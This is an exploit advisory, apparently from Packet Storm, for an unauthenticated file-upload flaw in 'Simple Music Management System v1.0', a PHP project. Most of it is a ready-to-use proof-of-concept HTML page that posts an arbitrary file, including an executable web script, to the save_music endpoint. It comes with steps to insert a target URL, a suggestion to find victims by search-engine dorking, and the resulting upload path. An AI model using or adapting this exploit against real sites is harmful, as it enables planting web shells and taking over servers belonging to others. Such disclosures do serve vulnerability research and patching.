## https://sploitus.com/exploit?id=PACKETSTORM:181930
=============================================================================================================================================  
| # Title : Simple Music Management System v1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/php/12978/music-management-system-in-php-php-project-source-code |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking in Google or other search engines.  
  
[+] The following HTML page uploads an arbitrary file (for example a .txt or an executable web script) to the target through the unauthenticated ajax.php?action=save_music endpoint; the "cover" file field is not validated server-side.  
  
[+] Go to line 27 of poc.html (the url: value in the $.ajax call).  
  
[+] Replace http://127.0.0.1/music with the target site link (do the same for the redirect URL further down) and save the changes.  
  
[+] Save the code as poc.html and open it in the browser.  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Music Upload Form</title>  
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>  
</head>  
<body>  
  
<form id="manage-music" enctype="multipart/form-data">  
<label for="cover-input">Cover:</label>  
<input type="file" id="cover-input" name="cover" onchange="displayImgCover(this)">  
<br>  
<img id="cover" src="#" alt="Cover Preview" style="max-width: 200px; display:none;">  
<br>  
<input type="submit" value="Upload">  
</form>  
  
<script>  
// Handle form submission with AJAX  
$('#manage-music').submit(function(e){  
e.preventDefault();  
start_load(); // Placeholder for loader function  
  
$.ajax({  
url: 'http://127.0.0.1/music/ajax.php?action=save_music', // line 27: replace with the target's base URL  
data: new FormData($(this)[0]),  
cache: false,  
contentType: false,  
processData: false,  
method: 'POST',  
type: 'POST',  
success: function(resp) {  
if (resp == 1) {  
alert_toast('Data successfully saved', "success");  
setTimeout(function(){  
end_load(); // Placeholder to stop loader  
_redirect('http://127.0.0.1/music/index.php?page=music_list'); // Redirect to music list page  
}, 2000);  
}  
}  
});  
});  
  
// Function to display the selected image (cover preview)  
function displayImgCover(input) {  
if (input.files && input.files[0]) {  
var reader = new FileReader();  
reader.onload = function (e) {  
$('#cover').attr('src', e.target.result).show(); // Show the image preview  
};  
reader.readAsDataURL(input.files[0]);  
}  
}  
  
// Placeholder functions for loader and redirect  
function start_load(){  
console.log("Loading started...");  
// Add your loading spinner code here  
}  
  
function end_load(){  
console.log("Loading finished.");  
// Add your code to stop the loading spinner here  
}  
  
function alert_toast(message, type){  
alert(message); // Basic alert, replace with a toast library if needed  
}  
  
function _redirect(url){  
window.location.href = url;  
}  
</script>  
  
</body>  
</html>  
  
  
[+] Result: the uploaded file is stored under assets/uploads/ with its original name prefixed by the server's Unix timestamp, for example:  
  
[+] http://127.0.0.1/music/assets/uploads/1726232340_hacked.txt  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================